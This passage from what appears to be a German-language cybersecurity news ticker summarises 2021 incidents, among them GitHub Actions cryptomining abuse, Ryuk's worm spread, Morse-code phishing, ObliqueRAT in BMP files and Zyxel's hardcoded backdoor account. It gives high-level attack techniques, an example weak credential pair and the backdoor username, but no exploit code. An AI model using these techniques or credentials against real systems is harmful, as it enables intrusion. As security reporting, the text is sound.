Den Grund, weshalb man sich nicht auf eine Lösegeldzahlung einlassen sollte, zeigt die Studie ebenfalls klar. Nur 13 Prozent der betroffenen Europäer (weltweit 29 Prozent) waren in der Lage, alle ihre verschlüsselten Daten wiederherzustellen - unabhängig davon, ob sie das Lösegeld bezahlten oder nicht. 20 Prozent (13 weltweit) verloren sogar fast alle Daten. 

 

 

 

Eine Geldübergabe sei keine Garantie dafür, die Daten auch wieder zurückzuerhalten. Stattdessen ermutige sie die Cyberkriminellen, ihre Praktiken fortzuführen, sagt Titova. "Wir empfehlen daher grundsätzlich allen Ransomware-Betroffenen nicht zu zahlen, da eine Zahlung diese kriminelle Masche nur weiter anheizt."

Stattdessen solle man lieber in den Schutz der Geräte investieren und alle (wichtigen) Daten regelmässig in einem Back-up sichern. Dies mache derartige Erpressungsversuche für die Cyberkriminellen weniger lukrativ. "Erpressungsversuche gehen dann zurück, und die Zukunft wird für alle Internetnutzer sicherer", sagt Titova. Die komplette Kaspersky-Studie können Interessierte hier als PDF lesen.

Wenn Sie mehr zu Cybercrime und Cybersecurity lesen möchten, melden Sie sich hier für den wöchentlichen Newsletter von Swisscybersecurity.net an. Auf dem Portal gibt es täglich News über aktuelle Bedrohungen und neue Abwehrstrategien.


 

06.04.2021 - 12:01 Uhr

Cyberkriminelle schürfen mit Github-Servern nach Kryptowährungen

Unbekannte nutzen derzeit die Infrastruktur der Entwicklerplattform Github, um nach Kryptowährungen zu schürfen. Um die Github-Server zu missbrauchen, nutzen die Cyberkriminellen Github Actions, wie "Heise" berichtet. Github Actions ist ein Tool für Continuous Integration/Continuous Delivery (CI/CD) zum Automatisieren von Softwareprozessen.

Die Cyberkriminellen würden zunächst einen Fork eines echten Repository erstellen und diesen mit bösartigem Code ergänzen. Anschliessend richten sie einen Pull Request an die Betreiber des ursprünglichen Repository zum Zurückmergen des Codes. Der Request genüge bereits; eine Zustimmung der Betreiber sei nicht nötig, um den Code zusammenzuführen. Aktuell seien mindestens 95 Repositorys betroffen.

Aufgrund des Pull Requests und dem enthaltenen Schadcode erstelle Github eine virtuelle Maschine. Diese richte die Schürf-Software auf den Servern von Github ein. Gemäss Justin Perdok, der auf Twitter über die Attacke berichtete, können die Angreifer mit jeder Attacke rund 100 Kryptominer einschleusen – was eine sehr hohe Belastung der Rechenleistung bedeutet. 

Die Attacken sollen schon seit vergangenen November laufen. Laut dem Portal "The Record" untersucht Github die Vorfälle bereits. Bislang lässt der Erfolg jedoch noch auf sich warten: Sobald Github ein betrügerisches Konto sperre, registrieren die Kriminellen einfach ein neues Konto. Die betroffenen Projekte der Benutzerinnen und Benutzer kommen aktuell nicht zu Schaden. Das Problem sei eher die Zweckentfremdung von Githubs Infrastruktur. 
 

22.03.2021 - 12:28 Uhr

Zoom-Bug zeigt beim Screen-Sharing mehr als man will

Ein Zoom-Meeting. Zuvor arbeitete man Stunden an der perfekten Powerpoint-Präsentation. Also teilt man natürlich den Bildschirm, damit die anderen im Meeting die Präsentation bestaunen können. Klingt harmlos, ist es aber nicht immer. Der deutsche Pentesting-Anbieter SYSS entdeckte eine Sicherheitslücke in Zooms Screen-Sharing-Funktion

Nutzer und Nutzerinnen können beim Teilen des Bildschirms wählen, ob sie den ganzen Desktop oder nur eine spezifische Applikation oder einen Bildschirmausschnitt teilen möchten. Die Schwachstelle mit der Bezeichnung CVE-2021-28133 sorgt jedoch dafür, dass ein User unter gewissen Voraussetzungen kurzzeitig unabsichtlich viel mehr präsentieren könnte, als er eigentlich möchte. 

Wird ein geteiltes Fenster durch eine andere Applikation überlagert, wird der Inhalt dieses zweiten, nicht geteilten Fensters sichtbar. Das Problem ist gemäss SYSS zuverlässig reproduzierbar und trete auf Windows beim Öffnen und auf Linux-Systemen beim Schliessen einer weiteren Anwendung auf. 

Das Cybersecurity-Unternehmen entdeckte die Lücke im Dezember 2020. Die aktuelle Version 5.5.4 (13142.0301) von Zoom sei aber noch immer betroffen. Nach eigenen Angaben veröffentlicht SYSS Informationen zu Sicherheitslücken erst, wenn ein Patch vorhanden ist oder 45 Tage nachdem das Unternehmen das Problem beim Hersteller gemeldet hat. 

Gemäss einem Statement gegenüber "The Hacker News" arbeitet Zoom bereits an einer Lösung. Dass noch kein Patch bereitsteht, mag daran liegen, dass sich die Schwachstelle nur schwierig ausnutzen lässt und die Bedrohung daher als gering eingeschätzt werden könnte. 

 

15.03.2021 - 17:05 Uhr

Grosse Mehrheit der Unternehmen leidet an Cryptominer-Befall

Das Schürfen von Kryptowährungen wie etwa Bitcoin ist sehr ressourcenintensiv und benötigt eine enorme Rechenleistung. Dabei werden neue Bitcoins generiert, indem man komplexe mathematische Probleme löst. Je mehr Bitcoins geschürft wurden, desto schwieriger werden die Algorithmen, die es zu knacken gilt, um neue zu erzeugen. 

18,5 Millionen der 21 Millionen möglichen Bitcoins wurden bereits generiert. Ein normaler Computer hat heute keine Chance mehr, neue Bitcoins zu erzeugen. Cyberkriminelle, für die das Schürfen von Kryptowährungen ein dankbarer Nebenverdienst ist, greifen daher gerne auf die Rechenleistung ihrer unwissenden Opfer zu. Dies wird als Cryptomining bezeichnet. 

Es gibt viele Wege, die Rechenleistung anderer für Cryptomining anzuzapfen. So lassen sich etwa auch entsprechende bösartige Javaskripte in Websites und Appliaktionen verbergen. Im Gegensatz zu beispielsweise Ransomware ist eine Infektion sehr unauffällig - ausser beim DNS-Verkehr. 

Über zwei Drittel werden angezapft

Wie Cisco in seinem "Threat Trends: DNS Security”-Bericht festhält, sind Cryptominer relativ aktiv im DNS-Bereich. Wer etwa Bitcoin schürft, nutzt seine Hardware auch, um Bitcoin-Transkationen zu verifizieren. Dieser Prozess benötigt gemäss Cisco viele DNS-Anfragen. 

Aufgrund des DNS-Verkehrs prüfte Cisco, wie viele Kunden von Cryptominer befallen wurden. Insgesamt werde die Rechenleistung von 69 Prozent der untersuchten Unternehmen angezapft, um zu schürfen, zitiert SearchSecurity den Cisco Data Scientist Austin McBride.

Dass diese Zahl so hoch sei, überrasche die Sicherheitsexperten nicht. Es überrasche Cisco hingegen sehr, dass Unternehmen Cryptomining als nicht sonderlich gefährlich einstufen würden. Schliesslich könnten solche Schadprogramme die Lebensdauer der Hardware verkürzen, die Bandbreite verstopfen, und AWS-Rechenkosten in die Höhe treiben. 

Zudem sehe Cisco immer wieder, dass Cyberkriminelle nach einer Cryptomining-Infektion später auch andere Malware auf die infizierten Geräte laden würden. In den nächsten Jahren, sagt McBride, werde das Cryptomining-Geschäft rapide wachsen.  
 

08.03.2021 - 14:28 Uhr

Hacker verstecken Ratten in Bildern, um unentdeckt zu bleiben

Der Remote-Access-Trojaner (RAT) ObliqueRAT ist zwar nicht neu. Er hat aber einen neuen Trick gelernt. Hacker verstecken die Malware nun in scheinbar harmlosen Bilddateien, wie Cisco Talos in einem Blogeintrag schreibt.

Für ihre Finte nutzen die Cyberkriminellen BMP-Dateien, die auf kompromittierten Websites gehostet werden. Die Quellcodes dieser Bilddateien beinhalten sowohl tatsächliche Bildinformationen als auch bösartige ausführbare Bytes. In einer anderen Variante enthalten die Bilddateien eine ZIP-Datei, in der das Schadprogramm steckt. 

Der Auslöser ist jeweils eine E-Mail. Diese versucht das Opfer dazu zu bringen, auf die URL mit dem Bild zu klicken. Macros in angehängten Dokumenten laden die Malware auf den Rechner herunter und infizieren diesen so.

Zugriff auf die Webcam

Der Funktionsumfang von ObliqueRAT erhielt ebenfalls ein Upgrade. Neu könne das Schadprogramm etwa auch für Screenshots und Videoaufnahmen auf die Webcam zugreifen und beliebige Befehle ausführen. 

ObliqueRAT wurde erstmals im Februar 2020 dokumentiert. Dahinter steckt vermutlich die Hackergruppe Transparent Tribe – auch bekannt als Operation C-Major, Mythic Leopard oder APT36. 

Die äusserst aktive Gruppe soll angeblich aus Pakistan stammen und wird in Verbindung gebracht mit Cyberattacken auf Menschenrechtsaktivisten in dem Land sowie gegen Militär- und Regierungsangehörige in Indien. Die aktuelle Kampagne mit den BMP-Dateien richtet sich gegen Ziele in Südost-Asien.

 

01.03.2021 - 15:28 Uhr

Ryuk-Ransomware ist jetzt auch ein Wurm

Die Agence Nationale de la Sécurité des Systèmes d'Information (ANSSI) hat eine neue Variante der Ransomware Ryuk entdeckt. Die nationale Cybersicherheitsbehörde Frankreichs fand das Schadprogramm bei einer Untersuchung einer Cyberattacke Anfang 2021 (Bericht als PDF). 

Die Variante kommt mit einem neuen Trick: Ryuk ist nun wurmfähig. Der neue Strang der Ransomware-Familie kann sich selbstständig in einem lokalen Netzwerk ausbreiten, wie "Bleepingcomputer" berichtet. 

Um andere Rechner zu infizieren, listet diese neue Variante alle IP-Adressen, die sie im lokalen ARP-Cache finden kann. An diese Adressen schickt Ryuk anschliessend einen Wake-On-LAN-Befehl. So kann die Ransomware auch ausgeschaltete Computer über die eingebaute Netzwerkkarte starten. 

Geplante Tasks helfen bei der Infektion

Anschliessend kopiert die Ransomware sich selbst auf diese Rechner und verschlüsselt sämtliche darauf befindlichen Daten. Das Schadprogramm kann sich auch aus der Ferne ausführen. Dafür nutzt Ryuk geplante Tasks, die mit dem legitimen Windows-Tool "schtasks.exe" erstellt werden. 

Die Ransomware Ryuk gehört zu den am meisten verbreiteten Schadprogrammen. Bislang sollen die Drahtzieher hinter der Malware über 150 Millionen US-Dollar mit Lösegeldern verdient haben (Lesen Sie dazu mehr im Eintrag vom 11.01.2021 "Ryuk-Ransomware bringt Drahtziehern 150 Millionen US-Dollar ein"). 

Ein Grund dafür ist die Nutzung von Affiliate-Programmen: Wer Teil der Ransomware-as-a-Service-Gruppe werden will, kann sich dafür bewerben. So baute sich die Gruppe quasi eine Vertriebsorganisation für seine Ransomware auf. Diese attackiert etwa 20 Unternehmen pro Woche (Stand: drittes Quartal 2020).

22.02.2021 - 15:38 Uhr

Die ersten Schadprogramme sind bereits hungrig auf Apples neuen M1-Chip

Es ist lediglich 3 Monate her, seit Apple seinen eigenen Chip, den M1, vorgestellt hat. Der ARM-basierte Prozessor treibt die jüngste Generation von Apples Macbooks - inklusive Pro und Air - sowie den Mac Mini an. Die ersten Cyberkriminellen haben ihre Antwort darauf allerdings bereits parat. 

Apple kündigte den M1-Chip am 10. November 2020 an. Alles zur Ankündigung sowie mehr zu den neuen Macs können Sie hier nachlesen.

IT-Security-Experten fanden nicht nur eine, sondern schon zwei Schadprogramme, die es spezifisch auf M1-Geräte abgesehen haben. Die erste Malware, die nativ auf einer M1-Architektur läuft, wurde vom MacOS-Sicherheitsforscher Patrick Wardle gefunden. Es handelt sich dabei um eine schädliche Safari-Erweiterung namens Gosearch22. 

Gosearch22 scheint auf den ersten Blick eine legitime Browser-Erweiterung zu sein. Im Hintergrund schnüffelt sie jedoch im Verlauf des Nutzers herum und blendet eine Vielzahl von Werbungen ein. Die angezeigten Banner und Pop-ups verlinken teilweise auf Websites, die weitere Schadprogramme auf den Rechner laden. 

Die Erweiterung wurde ursprünglich für x86-Chips entwickelt und in jüngster Vergangenheit für M1-Umgebungen portiert. Einerseits laufe das Schadprogramm so deutlich effizienter und andererseits falle es so auch weniger auf, berichtet Ars Technica.

Selbstzerstörungsmechanismus versagte

Diese erste Malware mag vielleicht noch harmlos klingen. Die zweite Meldung, die kurz darauf kam, ist aber schon deutlich besorgniserregender. Die IT-Security-Anbieter Malwarebytes und Red Canary entdeckten eine mysteriöse Malware, die sich auf 30'000 Macs eingenistet hat.

Das Schadprogramm - die Forscher nannten es Silver Sparrow - hat es nicht nur auf M1-Systeme abgesehen. Aber eine der Varianten wurde spezifisch für die neuen Chips entwickelt, wie The Verge berichtet

Silver Sparrow wurde entwickelt, um ein noch unbekanntes weiteres Schadprogramm nachzuladen. Es verfügt über einen Selbstzerstörungsmechanismus. Dieser soll verhindern, dass die Malware entdeckt wird. Was in diesem Fall offensichtlich nicht funktioniert hat. 

Gemäss den IT-Security-Anbietern gibt es noch keine Anzeichen dafür, dass Silver Sparrow tatsächlich einen Schaden verursacht hat. Und Apple hat bereits Schritte eingeleitet, die verhindern sollen, dass man die Malware versehentlich installiert.

Aber das ist nur bedingt beruhigend. Denn sowohl Silver Sparrow als auch Gosearch22 wurden aktiv auf infizierten Geräten gefunden. Während viele Apple-Nutzer also noch denken, es gibt keine Malware auf Apple-Geräten, infizieren Cyberkriminelle bereits erste Opfer mit der aktuellsten Macbook-Generation.

15.02.2021 - 17:32 Uhr

Cyberpunk-Entwickler CD Projekt Red gleich dreifach gebeutelt

Es hätte die grösste Videospiel-Lancierung des Jahres werden sollen. In dem Open-World-Action-Rollenspiel Cyberpunk 2077 des polnischen Entwicklers CD Projekt Red muss sich der Spieler durch eine neonfarbige Dystopie hacken. 

Der Hype war riesig. Doch der Launch hielt in den Augen vieler Gamer nicht die Versprechen ein, die im Vorfeld gemacht wurden. Insbesondere auf Konsolen war das Spiel von technischen Problemen geplagt. Aufgrund dessen sah sich der Entwickler gezwungen, den Spielern ihr Geld zurück zu erstatten. Zeitweilig verschwand das Game nach dem Verkaufsstart sogar wieder von den Playstation- und Xbox-Stores, wie verschiedene Medien, darunter "Bloomberg" und "The Verge", berichteten. 

Hacken während dem Hacken 

Für CD Projekt Red war dies jedoch erst der Anfang der Probleme. Wie sich herausstellte, konnten die Gamer, während sie im Spiel virtuell am hacken waren, selbst gehackt werden. Eine Schwachstelle in der Art, wie das Spiel DLL-Dateien nutzte, ermöglichte es einem Angreifer, beliebigen Code auf dem Rechner auszuführen. So könnte er etwa mit einer bösartigen Mod oder einem präparierten Custom Save File den PC infizieren und auch Malware darauf laden. 

CD Projekt Red löste dieses Problem zwar mit dem Hotfix 1.12, wie "Bleepingcomputer" berichtet. Aber kurz darauf kam schon der nächste Schlag für das polische Studio. Am 9. Februar teilte CD Projekt Red auf Twitter mit, dass das Unternehmen Opfer einer Ransomware-Attacke geworden sei. 

 

 

Die Angreifer hätten sich Zugriff auf die internen Systeme verschafft, diese verschlüsselt und die Quellcodes von Cyberpunk 2077, Gwent, Witcher 3 sowie einer unveröffentlichten Version von Witcher 3 gestohlen. Es sollen jedoch keine persönlichen Daten von Mitarbeitenden oder Gamern entwendet worden sein.

Source Code angeblich versteigert

Das Studio sagte deutlich, dass es nicht mit den Cyberkriminellen verhandeln werde. Kurz darauf standen die gestohlenen Daten zur Auktion in einem Hackerforum. Ausser den Quellcodes der Games stünden auch interne Dokumente zum Verkauf. Diese sollen angeblich irgendwelche unlauteren Machenschaften von CD Projekt Red dokumentieren. 

Die Cyberkriminellen wollten 1 Million US-Dollar als Grundgebot – oder 7 Millionen um die Daten sofort zu kaufen. Schon am nächsten Tag war das Angebot weg. Die Daten seien bereits verkauft worden. 

Ob das Angebot echt war und wer in diesem Fall die Daten gekauft hat, ist gemäss "Bleepingcomputer" nicht bekannt. Im Internet tummeln sich jedoch bereits zahlreiche Theorien. Vielleicht war es ein Rivale, der es auf die Firmengeheimnisse des polnischen Entwicklers abgesehen hatte. Oder vielleicht war es auch CD Projekt Red selbst, um eben diese Geheimnisse unter Verschluss zu behalten. 

15.02.2021 - 17:02 Uhr

Diese Schadprogramme wollen den Start ins neue Jahr vermasseln

Ende Januar hat Europol den vielseitigen Banking-Trojaner Emotet lahmgelegt. Ermittler und Ermittlerinnen aus den Niederlanden, Deutschland, den Vereinigten Staaten, Grossbritannien, Frankreich, Litauen, Kanada und der Ukraine brachten die Botnet-Infrastruktur unter ihre Kontrolle. 

Seitdem ging die Anzahl weltweit durch Emotet betroffene Organisationen um 14 Prozent zurück, wie der israelische Sicherheitsanbieter Check Point mitteilt. Dennoch war Emotet im Januar 2021 nach wie vor die Top-Malware. Mehr als 6 Prozent der globalen Firmen seien dem Schadprogramm zum Opfer gefallen. In der Schweiz lag der Anteil sogar bei über 16 Prozent. 

Die endgültige Löschung von Emotet ist auf den 25. April 2021 angesetzt. Bis dahin könnte das Schadprogramm also auch weiterhin in den monatlichen Top-Malware-Listen von Check Point auftauchen. 

Emotet ist nicht der einzige Banking-Trojaner auf der aktuellen Liste. An zweiter Stelle mit einem Anteil von 8,9 Prozent in der Schweiz folgt Dridex. Der dritte Banking-Trojaner auf der Liste, Trickbot, befiel im Januar 2,5 Prozent der Schweizer Firmen. Das Schadprogramm fällt vor allem dadurch auf, dass es ständig neue Tricks lernt, um die Opfer zu täuschen und die Cyberabwehr zu umgehen. 

Die komplette "Most Wanted Malware"-Liste für Januar 2021 von Check Point:

  1. Emotet (Banking-Trojaner): 16,12 Prozent der Schweizer und 6,38 Prozent der globalen Firmen
  2. Dridex (Banking Trojaner): 8,88 Prozent der Schweizer und 3,28 Prozent der globalen Firmen
  3. Phorpiex (Botnet): 7,10 Prozent der Schweizer und 3,92 Prozent der globalen Firmen
  4. Hiddad (Android-Malware): 3,01 Prozent der Schweizer und 2,65 Prozent der globalen Firmen
  5. Trickbot (Banking-Trojaner): 2,46 Prozent der Schweizer und 3,67 Prozent der globalen Firmen
  6. RigEK (Exploit Kit):1,78 Prozent der Schweizer und 1,74 Prozent der globalen Firmen
  7. Formbook (Infostealer): 1,64 Prozent der Schweizer und 0,41 Prozent der globalen Firmen
  8. Blindingcan (RAT): 1,09 Prozent der Schweizer und 6,38 Prozent der globalen Firmen
  9. CPUminer-Multi (Cryptominer): 0,96 Prozent der Schweizer und 0,79 Prozent der globalen Firmen)
  10. NJRat (RAT): 0,96 Prozent der Schweizer und 1,47 Prozent der globalen Firmen
  11. Fritzfrog (P2P-Botnet): 0,96 Prozent der Schweizer und 1,42 Prozent der globalen Firmen
  12. Smokeloader (Trojaner): 0 Prozent der Schweizer und 0,35 Prozent der globalen Firmen
     

08.02.2021 - 19:02 Uhr

Neue Phishing-Attacke veräppelt Cyberabwehr mit Morsecode

Cyberkriminelle erfinden ständig neue Methoden, um die Cyberabwehr ihrer Opfer zu überlisten. Bei diesem Unterfangen kann auch mal ein sehr alter Trick die moderne IT-Security aushebeln. In diesem konkreten Fall etwa der Morsecode. 

Morsecode wird seit seiner Erfindung im Jahr 1837 genutzt für die telegrafische Übermittlung von Nachrichten. Dabei werden Ton-, Funk- oder elektrische Signale genutzt. Auch ein blinkendes Licht oder irgendein anderes Medium, das zwei verschiedene Zustände und variable Längen darstellen kann. 

Wie "Bleepingcomputer" berichtet, nutzen Cyberkriminelle den Code, um die boshaften URLs in ihren Phishing-Kampagnen zu verstecken. So wollen sie ihre Attacken an Mail-Filter und –Gateways vorbei schleusen. 

.--. .... .. ... .... .. -. --. / .--. . .-. / .- -. .... .- -. --.

Der Phishing-Angriff beginnt mit einer E-Mail. Diese erwähnt im Betreff eine Rechnung sowie den Namen der adressierten Firma. Im Anhang ist aber keine Rechnung, sondern eine HTML-Datei enthalten, die sich als Excel-File ausgibt. 

Der spannende Teil der Datei ist in Morsecode verschlüsselt. Der Code wird anschliessend zunächst in einen hexadezimalen String und dann in Javascript-Tags umgewandelt. Diese wiederum werden anschliessend in eine HTML-Seite eingespeist. 

(Source: Bleepingcomputer)

Der HTML-Anhang ist teilweise in Morsecode verschlüsselt. (Source: Bleepingcomputer)

Wozu das Ganze? Die Skripte und der HTML-Anhang verfügen zusammen über die nötigen Ressourcen, um eine gefälschte Excel-Datei mitsamt Login-Fenster anzuzeigen. Dem Opfer wird dabei vorgegaukelt, dass seine Anmeldung abgelaufen sei und er sich erneut anmelden müsse. Sollte jemand seine Zugangsdaten eintippen und absenden, landen diese in den Händen der Angreifer. 

11 zielgerichtete Attacken

Die Attacken sind gemäss dem Bericht sehr deutlich auf die Opfer zugeschnitten. So blendet das gefälschte Anmeldeformular etwa auch das Logo der Opferfirma ein über die "logo.clearbit.com"-API. Sollte kein Logo auffindbar sein, generiert das Skript ein generisches Office-365-Logo. 

Bleepingcomputer wurde erstmals aufgrund eines Reddit-Posts auf diese neue Masche aufmerksam. Seitdem habe das Nachrichtenportal zahlreiche aktuelle Meldungen mit diesem Schema auf Virustotal gefunden. Bislang sind 11 Opfer bekannt – darunter der japanische Reifenhersteller Bridgestone. 

Welche Marken werden besonders oft imitiert durch Phishing-Attacken? Check Point ging dieser Frage nach. Mehr dazu lesen Sie hier.
 

01.02.2021 - 14:39 Uhr

Ein Wurm frisst sich durch Whatsapp-Kontakte hindurch

"Diese Anwendung herunterladen und Smartphone gewinnen." Diese Nachricht geistert unlängst im populären Messenger-Dienst Whatsapp herum. Die Nachricht kommt von einem bekannten Kontakt. Oder jedenfalls von dessen Handy, denn der eigentliche Absender ist ein Whatsapp-Wurm, wie Eset mitteilt. 

Die Nachricht kommt mit einem Link. Dieser führt jedoch nicht zu einem Gewinnspiel, sondern zu einer schädlichen App aus einem gefälschten Google Play Store. Die App tut so, als sei sie von Huawei.

Die Malware will bei der Installation unter anderem auch Zugriff auf die Kontakte erhalten. So kann sie anschliessend mit einer vorgefertigten Antwort auf einkommende Nachrichten reagieren und den Download-Link weiter verbreiten.

Laut dem slowakischen IT-Security-Anbieter nutzen die Cyberkriminellen die Malware hauptsächlich für Adware- und Abonnement-Betrugskampagnen. Es sei aber nicht auszuschliessen, dass die wurmfähige Malware auch für andere Zwecke verwendet werden könnte. "In einem nächsten Schritt könnten auch Banking-Trojaner, Ransomware oder Spyware verteilt werden", sagt Lukas Stefanko, Malware Forscher bei Eset.

Eset rät daher, Links, die man in einer Nachricht eines Messenger-Dienstes erhält, immer zu prüfen, bevor man sie anklickt. Ausserdem ist es ratsam, Apps nur direkt über den offiziellen Store herunterzuladen. 

Mehr Informationen zum Whatsapp-Wurm gibt's im Blogeintrag von Eset.
 

25.01.2021 - 15:55 Uhr

Zwei Kinder hacken Linux Mint – aus Versehen

Wie schwierig ist es, ein Linux-Mint-System zu hacken? Es ist - wortwörtlich! - ein Kinderspiel. Auf der Entwicklerplattform Github beschreibt ein Nutzer, wie seine Kinder seinen Laptop hacken wollten. Er liess die Kinder spielen - und musste erstaunt zusehen, wie es den Kindern tatsächlich gelang.

Die Kinder tippten mit ihren vier Händen gleichzeitig auf der physischen und auf der virtuellen Tastatur des Laptops. Dies brachte den Screensaver zum Abstürzen und gab das System frei. Danach lässt sich das System nicht mehr sperren. Um den Bildschirmschoner zu aktivieren, müsste man den Prozess manuell starten.

Dem Nutzer gelang es zwar nicht, den Fehler zu reproduzieren, seinen Kindern allerdings schon. Wie "Heise" berichtet, konnte die Entwickler-Community das Problem schliesslich identifizieren: das Schriftzeichen "ē". Wenn man diesen auf der Bildschirmtastatur (libcaribou) der Desktopumgebung Cinnamon eintippt, stürzt je nach Cinnamon-Version nur der Screensaver oder auch das ganze System ab.

Ein Patch, der das Problem behebt, steht unterdessen zum Download bereit. 

 

18.01.2021 - 17:32 Uhr

Dieser Gerätepfad führt zu nur einem Ziel: einem Bluescreen

Es gibt Orte, die man besser nicht besuchen sollte. Das gilt auch für die virtuelle Welt im Innern eines Windows-10-Rechners. Das Öffnen eines bestimmten simplen Gerätepfades in einem Browser führt nämlich unverzüglich zu einem kritischen Systemversagen und einem Bluescreen. Der Pfad lautet:

Path of Doom 

Entdeckt hat dies der Windows-Sicherheitsexperte Jonas Lykkegaard. Seit Oktober habe er mehrmals auf Twitter darauf hingewiesen, berichtet Bleepingcomputer. Bei dem Pfad handelt es sich um einen Win32-Device-Namespace-Pfad. Damit könnten Applikationen etwa direkt mit einem physischen Laufwerk interagieren – ohne dabei über das Dateisystem gehen zu müssen. 

Da ein Windows-Nutzer keine besonderen Rechte benötigt, um den Pfad auszuführen, lässt sich dieser Bug auch aktiv ausnutzen. Lykkegaard etwa demonstrierte, wie man einen PC angreifen kann mit einer manipulierten Windows-URL-Datei, die auf den Pfad verweist. Sobald ein Nutzer diese herunterlädt, stürzt der Rechner ab. Gemäss Bleepingcomputer gibt es noch zahlreiche weitere Möglichkeiten, den Bug auszunutzen. 

So sei es etwa denkbar, dass ein Angreifer, der sich Admin-Rechte verschafft hat, aus der Ferne sämtliche Rechner in einem Netzwerk zum Abstürzen bringen könnte. Das verursachte Chaos könnte dann genutzt werden, um Untersuchungen auszubremsen und den Hack zu verschleiern. 

11.01.2021 - 15:36 Uhr

Ryuk-Ransomware bringt Drahtziehern 150 Millionen US-Dollar ein

Die Drahtzieher hinter der Ryuk-Ransomware sollen bislang über 150 Millionen US-Dollar in Bitcoin verdient haben. Das Geld stammt von den gezahlten Lösegeldern, das sie von infizierten Unternehmen verlangten. 

Zu den Opfern dieser Ransomware zählt auch Sopra Steria. Der französische IT-Dienstleister gab vergangenen Oktober bekannt, dass seine IT-Systeme infiziert wurden, wie Sie hier nachlesen können. Der finanzielle Schaden blieb jedoch gering - dank einer raschen Reaktion sowie einer Cyberversicherung.

Die Schätzung zur Höhe des ergaunerten Betrags kommt von den Cybersecurity-Firmen Advanced Intelligence und HYAS. Die beiden Firmen konnten die Zahlungen auf 61 Bitcoin-Adressen zurückverfolgen. Ein grosser Teil des Geldes erhalten die Cyberkriminellen von einem "bekannten Broker", der die Zahlungen im Namen der Opfer tätigt. Die Zahlungen betragen üblicherweise einige Hunderttausend US-Dollar - manchmal handelt es sich jedoch auch um Millionenbeträge. 

Bitcoin an bekannten Tauschbörsen umgewandelt

Die Cybersecurity-Firmen haben das Geld weiterverfolgt. Zunächst wird es in Holding-Konten gesammelt, bevor es zu verschiedenen Geldwäschediensten weitergeleitet und anschliessend wieder in den kriminellen Markt eingeschleust wird, indem es zur Zahlung anderer krimineller Dienste genutzt wird.

Ein Teil des Geldes wird auch an Kryptotauschbörsen ausgezahlt. Advanced Intelligence und HYAS finden interessant, dass es sich bei diesen Börsen um seriöse und bekannte Tauschbörsen handelt, wie etwa Binance und Huobi. Andere Ransomware-Gruppen würden weniger bekannte Exchanges nutzen, um an ihr Geld zu kommen.

Zum Vergleich: Auch die Entwickler der Gandcrab-Ransomware sollen gemäss eigenen Behauptungen rund 150 Millionen Dollar eingenommen haben. Insgesamt soll die Ransomware - die auch als Dienstleistung genutzt werden konnte - über 2 Milliarden Dollar erbeutet haben. Lesen Sie im Eintrag "Nach eineinhalb Jahren Arbeit: Ransomware-Entwickler geniessen Ruhestand" vom 17. Juli 2019 mehr dazu. Die Cyberkriminellen hinter Wannacry sollen hingegen lediglich 386'905 Dollar ergaunert haben. Der durch die Ransomware verursachte Schaden soll aber näher bei 4 Milliarden Dollar liegen. 

04.01.2021 - 15:41 Uhr

Fast unsichtbarer Wurm lässt Windows- und Linux-Server für sich schürfen

Kurz vor dem Jahresende hat der New Yorker Cybersecurity-Anbieter Intezer vor einem neuen Wurm gewarnt. Der Schädling nistet sich in Linux- und Windows-Server ein, wie Intezer schreibt. Deren Rechenleistung nutzt er anschliessend, um nach der Kryptowährung Monero zu schürfen. 

Der Wurm schleust sich über öffentlich zugängliche Dienste ein. Konkret nennt Intezer etwa MySQL, Tomcat-Admin-Panels und Jenkins sowie die damit zusammenhängenden Ports 8080, 7001 und 3306. 

Der Zugriff erfolgt über eine Brute-Force-Attacke. Das heisst der Wurm prüft systematisch eine Liste häufiger Zugangsdaten bis er das Passwort geknackt oder die Liste erschöpft hat. Dafür verwende der Schädling ein hartkodiertes „Wörterbuch“ mit schwachen Kombinationen von Benutzernamen und Passwörtern - wie etwa "root:123456". 

Knapp die Hälfte der Antivirenlösungen erkennt den Wurm

Ist der Wurm einmal im System drin, nutzt er ein Dropper-Script per Bash oder Powershell, um einen MXRig-Miner zu installieren. Der Wurm kann sich selbstständig im Netzwerk verbreiten und so noch mehr Rechenleistung für seine Schürfaktion bündeln. Dabei springe er mühelos von einer Windows- zu einer Linux-Plattform und umgekehrt, schreibt das Cybersecurity-Unternehmen. 

Als Intezer seine Warnung Ende Dezember publizierte, wurde der Wurm von keiner Anti-Virus-Lösungen erkannt. Wie Virustotal zeigt, haben die Anbieter von Cyberabwehrlösungen in den vergangenen Tagen jedoch nachgerüstet. Aktuell können fast die Hälfte der auf Virustotal geprüften Engines den Schädling entdecken – darunter die Lösungen von Eset, G Data, Kaspersky, Symantec und Trend Micro (Stand: 4.01.2021).

Geschrieben wurde der Wurm in der Programmiersprache Go beziehungsweise Golang. Die vergleichsweise noch junge Programmiersprache wurde von Google-Mitarbeitenden entwickelt. Diese versprechen mit Go eine einfache Codierung sowie eine effiziente Code-Kompilierung und Ausführung.

04.01.2021 - 15:14 Uhr

Zyxel verbaut Hintertüren in Firewalls und APs

Der taiwanische Hersteller von Netzwerkprodukten Zyxel hat Backdoors in verschiedene Geräte eingebaut. Davon betroffen sind die Firewalls der ATP-, USG-, USG-Flex- und VPN-Serien, welche die Firmwareversion ZLD V4.60 nutzen sowie die WLAN-Access-Point-Controller NXC2500 und NXC5500 (Firmwareversionen V6.00 bis V6.10). Dies schreibt der Hersteller in einer Sicherheitswarnung

Die Firmware kommt nämlich mit einem fest einprogrammierten Zugangskonto. Über das Konto lassen sich Veränderungen der installierten Software vornehmen, wie Heise berichtet. Nutzer - auch unbefugte - können mit den Zugangsdaten per SSH und Web-Interface auf die Geräte zugreifen. 

Zugangsdaten im Klartext gespeichert.

In der Kontoverwaltung taucht das Konto nicht auf. Gemäss Zyxel sei es dazu da, um automatische Firmware-Updates an angeschlossene Access Points via FTP auszuliefern.

Der Benutzername ("zwyfp") und das dazugehörige Passwort sind fix einprogrammiert und können nicht geändert werden. Aber was alles noch viel schlimmer macht: Die Zugangsdaten sind im Klartext in einer Binary-Datei abgespeichert. 

Zyxel hat die Firmware ZLD V4.60 bereits zurückgezogen und durch ZLD V4.60 Patch 1 ersetzt. Die APs hätten ursprünglich erst im April einen Patch erhalten sollen, wie es in dem Bericht heisst. Nun sollen die Updates aber bereits am 8. Januar kommen. 

Entdeckt wurde die als CVE-2020-29583 bezeichnete Schwachstelle von Niels Teusink. Dieser arbeitet laut Zyxel für den niederländischen Cybersecurity-Anbieter Eye.

